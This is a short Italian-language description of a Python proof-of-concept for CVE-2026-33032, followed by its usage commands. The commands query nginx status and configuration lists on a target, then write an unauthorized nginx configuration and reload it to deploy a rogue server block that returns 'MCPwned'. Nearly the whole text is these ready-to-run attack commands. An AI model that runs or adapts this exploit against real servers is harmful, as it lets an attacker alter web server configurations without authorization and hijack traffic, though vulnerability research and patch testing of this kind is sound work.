
Proof-of-concept in Python per CVE-2026-33032 che ispeziona lo stato e le configurazioni di nginx, quindi dimostra la scrittura non autorizzata della configurazione con ricarica per distribuire un blocco server rogue.
python3 main.py http://target:9000 --tool nginx_status
python3 main.py 10.0.0.50 --tool nginx_config_list
python3 main.py http://target:9000 \
--tool nginx_config_add \
--payload poc.conf \
--content 'server { listen 8443; return 200 "MCPwned\n"; }'